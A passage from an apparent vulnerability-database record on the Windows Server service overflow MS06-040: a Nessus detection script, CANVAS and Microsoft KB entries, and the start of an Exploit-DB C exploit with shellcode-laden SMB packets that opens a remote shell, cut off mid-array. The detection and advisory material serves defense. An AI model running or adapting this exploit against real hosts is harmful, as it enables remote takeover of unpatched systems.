hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:09:21", "bulletinFamily": "scanner", "description": "The remote host is vulnerable to a buffer overrun in the 'Server' service that may allow an attacker to execute arbitrary code on the remote host with 'SYSTEM' privileges.", "modified": "2018-11-15T00:00:00", "id": "SMB_KB921883.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22194", "published": "2006-08-08T00:00:00", "title": "MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22194);\n script_version(\"1.32\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2006-3439\");\n script_bugtraq_id(19409);\n script_xref(name:\"MSFT\", value:\"MS06-040\");\n script_xref(name:\"MSKB\", value:\"921883\");\n\n script_name(english:\"MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check)\");\n script_summary(english:\"Determines the presence of update 921883\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\n'Server' service.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is vulnerable to a buffer overrun in the 'Server'\nservice that may allow an attacker to execute arbitrary code on the\nremote host with 'SYSTEM' privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-040\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows 2000, XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-3439\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Windows\");\n\n script_dependencies(\"smb_nativelanman.nasl\",\"smb_login.nasl\");\n script_require_keys(\"Host/OS/smb\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n#\n\ninclude ('smb_func.inc');\n\nglobal_var rpipe;\n\nfunction NetPathCanonicalize ()\n{\n local_var fid, data, rep, ret;\n\n fid = bind_pipe (pipe:\"\\browser\", uuid:\"4b324fc8-1670-01d3-1278-5a47bf6ee188\", vers:3);\n if (isnull (fid))\n return 0;\n\n # we initialize the buffer first\n data = class_parameter (name:\"m\", ref_id:0x20000) +\n class_name (name:\"\") +\n raw_dword (d:20) +\n class_name (name:\"nessus\") + # wcscpy in the buffer\n raw_dword (d:1) +\n raw_dword (d:0) ;\n\n\n data = dce_rpc_pipe_request (fid:fid, code:0x1f, data:data);\n if (!data)\n return 0;\n\n rep = dce_rpc_parse_response (fid:fid, data:data);\n if (!rep || (strlen(rep) != 32))\n return 0;\n\n ret = get_dword (blob:rep, pos:strlen(rep)-4);\n if ((ret != 0x84b) && (ret != 0x7b))\n return 0;\n\n # the patch should fill the buffer with 0, else it will return \"nessus\"\n data = class_parameter (name:\"m\", ref_id:0x20000) +\n class_name (name:\"\") + # the path reinitialize the buffer\n raw_dword (d:20) +\n class_name (name:\"\") +\n raw_dword (d:1) +\n raw_dword (d:0) ;\n\n data = dce_rpc_pipe_request (fid:fid, code:0x1f, data:data);\n if (!data)\n return 0;\n\n rep = dce_rpc_parse_response (fid:fid, data:data);\n if (!rep || (strlen(rep) != 32))\n return 0;\n\n ret = get_dword (blob:rep, pos:strlen(rep)-4);\n if ((ret != 0x84b) && (ret != 0x7b))\n return 0;\n\n ret = get_dword (blob:rep, pos:0);\n if (ret != 20)\n return 0;\n\n ret = get_string (blob:rep, pos:4, _type:1);\n if (ret == \"nessus\\\")\n return 1;\n\n return 0;\n}\n\nos = get_kb_item (\"Host/OS/smb\") ;\nif (\"Windows\" >!< os) exit(0);\n\nname = kb_smb_name();\nport = kb_smb_transport();\n\nif ( ! get_port_state(port) ) exit(0);\nsoc = open_sock_tcp(port);\nif ( ! soc ) exit(0);\n\nsession_init(socket:soc, hostname:name);\n\nr = NetUseAdd(share:\"IPC$\");\nif ( r == 1 )\n{\n ret = NetPathCanonicalize ();\n if (ret == 1)\n security_hole(port:port);\n\n NetUseDel();\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:27", "bulletinFamily": "exploit", "description": "**Name**| ms06_040 \n---|--- \n**CVE**| CVE-2006-3439 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Windows Server Service Overflow (MS06-040) \n**Notes**| References: http://www.microsoft.com/technet/security/Bulletin/MS06-040.mspx \nCVE Name: CVE-2006-3439 \nVENDOR: Microsoft \nMSADV: MS06-040 \nRepeatability: Infinite \nNote: Due to the primitive on the stack, the XP/2003 might not be that reliable. In worst case, try running it twice \nCVS URL: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439 \nDate public: 08/08/2006 \nCERT Advisory: http://www.kb.cert.org/vuls/id/650769 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439 \nCVSS: 10.0 \n\n", "modified": "2006-08-09T01:04:00", "published": "2006-08-09T01:04:00", "id": "MS06_040", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms06_040", "type": "canvas", "title": "Immunity Canvas: MS06_040", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2019-09-11T12:33:02", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves critical vulnerabilities in the Server service that could allow an attacker to take control of an affected system. We recommend that customers apply the security update immediately.</p><h2></h2><div class=\"kb-notice-section section\"></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS06-040. The security bulletin contains all the relevant information about the security update. This information includes file manifest information and deployment options. To view the complete security bulletin, visit the following Microsoft Web sites:<ul class=\"sbody-free_list\"><li>Home users:<div class=\"indent\"><a href=\"http://www.microsoft.com/athome/security/update/bulletins/200608.mspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/athome/security/update/bulletins/200608.mspx</a></div></li><li>IT professionals:<div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx\" id=\"kb-link-2\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx</a></div></li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues</h3>Users who have installed the original version of security update 921883 (security bulletin MS06-040) may have been affected by an issue that involves programs that request lots of contiguous memory, such as Microsoft Business Solutions - Navision 3.70. This issue occurs after you install security update 921883 on a computer that is running 32-bit applications in the following operating systems:<ul class=\"sbody-free_list\"><li> 64-bit and 32-bit versions of Microsoft Windows Server 2003 with Service Pack 1 (SP1)</li><li> Microsoft Windows XP Professional x64 Edition</li></ul> This issue is resolved in the version of the security update that was released on September 12, 2006. <span>For more information about this issue, click the following article number to view the article in the Microsoft Knowledge Base:<br/><br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/924054\" id=\"kb-link-3\">924054 </a> Programs that request lots of contiguous memory may fail after you install security update 921883 (MS06-040) on a Windows Server 2003 Service Pack 1-based computer or a Windows XP Professional x64-Edition-based computer<br/><br/></div></span></div></body></html>", "modified": "2017-03-30T05:53:28", "id": "KB921883", "href": "https://support.microsoft.com/en-us/help/921883/", "published": "2017-03-30T05:35:11", "title": "MS06-040: Vulnerability in Server service could allow remote code execution", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T15:47:28", "bulletinFamily": "exploit", "description": "MS Windows CanonicalizePathName() Remote Exploit (MS06-040). CVE-2006-3439. Remote exploit for windows platform", "modified": "2006-08-19T00:00:00", "published": "2006-08-19T00:00:00", "id": "EDB-ID:2223", "href": "https://www.exploit-db.com/exploits/2223/", "type": "exploitdb", "title": "Microsoft Windows - CanonicalizePathName Remote Exploit MS06-040", "sourceData": "/*\r\n\r\nMicrosoft Windows CanonicalizePathName() Remote Overflow MSO6-040\r\nMore info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx\r\nWritten by Preddy\r\n\r\nThis is another version of hdm's metasploit version but ported to C,\r\nWorks against Windows XP SP1\r\nAnd it should give a crash on Win2k in services.exe\r\n\r\nOn successfull exploitation it provides a remote shell at port 54321\r\nof your victim:\r\n\r\n./ms06 192.168.1.103\r\nTarget: 192.168.1.103\r\nAttack Finished: now open a new terminal and nc to your victim on port 54321\r\nWarning: Don't close this window!\r\n\r\n[open a new terminal/window/prompt]\r\n\r\nnc 192.168.1.103 54321\r\nMicrosoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32>\r\n\r\nhttp://www.team-rootshell.com\r\n\r\nGreetz to all of my friends at:\r\n\r\nFREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor\r\nMILW0RM(ABS.lcirc.net): #milw0rm\r\nSTS(irc.smashthestack.org): #lecture,#social (special greetz to: esper and crystal)\r\nPTP(irc.eu.pulltheplug.org): #aso,#Social\r\nGSO(gso.eclipticx.net): #gso-chat\r\nTTNET(irc.ttnet.net.tr):#coders,#linux,#nukedx,#zion,#php\r\nSSTNET(irc.0x557.net):#darpa,#exploits,#m00,#ph4nt0m,#rx.rx,#segfault,#sscan\r\n\r\nRootshell Security Group and everyone else ^^\r\n\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <stdarg.h>\r\n#include <sys/mman.h>\r\n\r\n#define PORT 139\r\n\r\nchar peer0_0[] = {\r\n0x81, 0x00, 0x00, 0x44, 0x20, 0x43, 0x4b, 0x46, \r\n0x44, 0x45, 0x4e, 0x45, 0x43, 0x46, 0x44, 0x45, \r\n0x46, 0x46, 0x43, 0x46, 0x47, 0x45, 0x46, 0x46, \r\n0x43, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x00, 0x20, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, \r\n0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00 };\r\n\r\nchar peer0_1[] = {\r\n0x00, 0x00, 0x00, 0x54, 0xff, 0x53, 0x4d, 0x42, \r\n0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, \r\n0x00, 0x00, 0x84, 0xec, 0x00, 0x31, 0x00, 0x02, \r\n0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, \r\n0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, \r\n0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4e, 0x54, \r\n0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x20, \r\n0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, 0x54, 0x20, \r\n0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 };\r\n\r\nchar peer0_2[] = {\r\n0x00, 0x00, 0x00, 0xb5, 0xff, 0x53, 0x4d, 0x42, \r\n0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, \r\n0x00, 0x00, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, \r\n0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x5c, 0xd0, 0x00, 0x80, 0x7a, 0x00, 0x60, \r\n0x55, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05, \r\n0x02, 0xa0, 0x4b, 0x30, 0x49, 0xa0, 0x0e, 0x30, \r\n0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, \r\n0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x37, 0x04, \r\n0x35, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, \r\n0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x02, 0x08, \r\n0x00, 0x09, 0x00, 0x09, 0x00, 0x20, 0x00, 0x00, \r\n0x00, 0x0c, 0x00, 0x0c, 0x00, 0x29, 0x00, 0x00, \r\n0x00, 0x57, 0x4f, 0x52, 0x4b, 0x47, 0x52, 0x4f, \r\n0x55, 0x50, 0x57, 0x4f, 0x52, 0x4b, 0x53, 0x54, \r\n0x41, 0x54, 0x49, 0x4f, 0x4e, 0x31, 0x57, 0x69, \r\n0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, \r\n0x30, 0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, \r\n0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, \r\n0x32, 0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, \r\n0x00 };\r\n\r\nchar peer0_3[] = {\r\n0x00, 0x00, 0x01, 0x04, 0xff, 0x53, 0x4d, 0x42, \r\n0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, \r\n0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x5c, 0xd0, 0x00, 0x80, 0xc9, 0x00, 0xa1, \r\n0x81, 0xa3, 0x30, 0x81, 0xa0, 0xa2, 0x81, 0x9d, \r\n0x04, 0x81, 0x9a, 0x4e, 0x54, 0x4c, 0x4d, 0x53, \r\n0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, \r\n0x00, 0x18, 0x00, 0x40, 0x00, 0x00, 0x00, 0x18, \r\n0x00, 0x18, 0x00, 0x58, 0x00, 0x00, 0x00, 0x12, \r\n0x00, 0x12, 0x00, 0x70, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x82, 0x00, 0x00, 0x00, 0x18, \r\n0x00, 0x18, 0x00, 0x82, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x02, 0x08, 0x00, 0x00, 0x01, 0x02, 0x03, 0x04, \r\n0x05, 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x25, 0xa6, 0x9f, 0x80, 0x96, \r\n0x31, 0x6c, 0xca, 0xa0, 0x08, 0x9f, 0x12, 0x7e, \r\n0x47, 0xcd, 0x45, 0x10, 0x25, 0x39, 0x7d, 0xf8, \r\n0x55, 0x66, 0x03, 0x57, 0x00, 0x4f, 0x00, 0x52, \r\n0x00, 0x4b, 0x00, 0x47, 0x00, 0x52, 0x00, 0x4f, \r\n0x00, 0x55, 0x00, 0x50, 0x00, 0x57, 0x00, 0x4f, \r\n0x00, 0x52, 0x00, 0x4b, 0x00, 0x53, 0x00, 0x54, \r\n0x00, 0x41, 0x00, 0x54, 0x00, 0x49, 0x00, 0x4f, \r\n0x00, 0x4e, 0x00, 0x31, 0x00, 0x57, 0x69, 0x6e, \r\n0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 0x30, \r\n0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, 0x57, \r\n0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, \r\n0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, 0x00 };\r\n\r\nchar peer0_4[] = {\r\n0x00, 0x00, 0x00, 0x3a, 0xff, 0x53, 0x4d, 0x42, \r\n0x75, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x04, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x01, 0x00, 0x0f, 0x00, 0x00, \r\n0x5c, 0x5c, 0x5c, 0x49, 0x50, 0x43, 0x24, 0x00, \r\n0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00 };\r\n\r\nchar peer0_5[] = {\r\n0x00, 0x00, 0x00, 0x5c, 0xff, 0x53, 0x4d, 0x42, \r\n0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x18, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x08, 0x00, 0x16, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x9f, 0x01, 0x02, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, \r\n0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, \r\n0x02, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x5c, \r\n0x42, 0x52, 0x4f, 0x57, 0x53, 0x45, 0x52, 0x00 };\r\n\r\nchar peer0_6[] = {\r\n0x00, 0x00, 0x00, 0x92, 0xff, 0x53, 0x4d, 0x42, \r\n0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x48, \r\n0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x4a, 0x00, 0x48, 0x00, 0x4a, 0x00, 0x02, \r\n0x00, 0x26, 0x00, 0x00, 0x40, 0x4f, 0x00, 0x5c, \r\n0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, \r\n0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd0, 0x16, \r\n0xd0, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8, 0x4f, \r\n0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, \r\n0x5a, 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, \r\n0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, \r\n0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, \r\n0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };\r\n\r\nchar peer0_7[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, \r\n0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, \r\n0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, \r\n0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, \r\n0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, \r\n0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, \r\n0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, \r\n0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, \r\n0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, \r\n0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, \r\n0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, \r\n0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, \r\n0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, \r\n0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, \r\n0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, \r\n0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, \r\n0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, \r\n0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, \r\n0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 0xb9, \r\n0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, \r\n0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, \r\n0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, \r\n0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, \r\n0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, \r\n0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, \r\n0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, \r\n0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, \r\n0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, \r\n0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, \r\n0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, \r\n0x7c, 0x45, 0x8e };\r\n\r\nchar peer0_8[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, \r\n0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, \r\n0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, \r\n0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, \r\n0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, \r\n0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, \r\n0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, \r\n0x8f, 0x45, 0x49, 0xb5, 0x60, 0xc8, 0x40, 0x88, \r\n0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, \r\n0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, \r\n0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, \r\n0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, \r\n0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, \r\n0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, \r\n0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, \r\n0x16, 0xfb, 0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, \r\n0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, \r\n0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, \r\n0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, \r\n0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, \r\n0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, \r\n0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, \r\n0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, \r\n0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, \r\n0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, \r\n0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, \r\n0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, \r\n0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, \r\n0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, \r\n0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, \r\n0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, \r\n0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 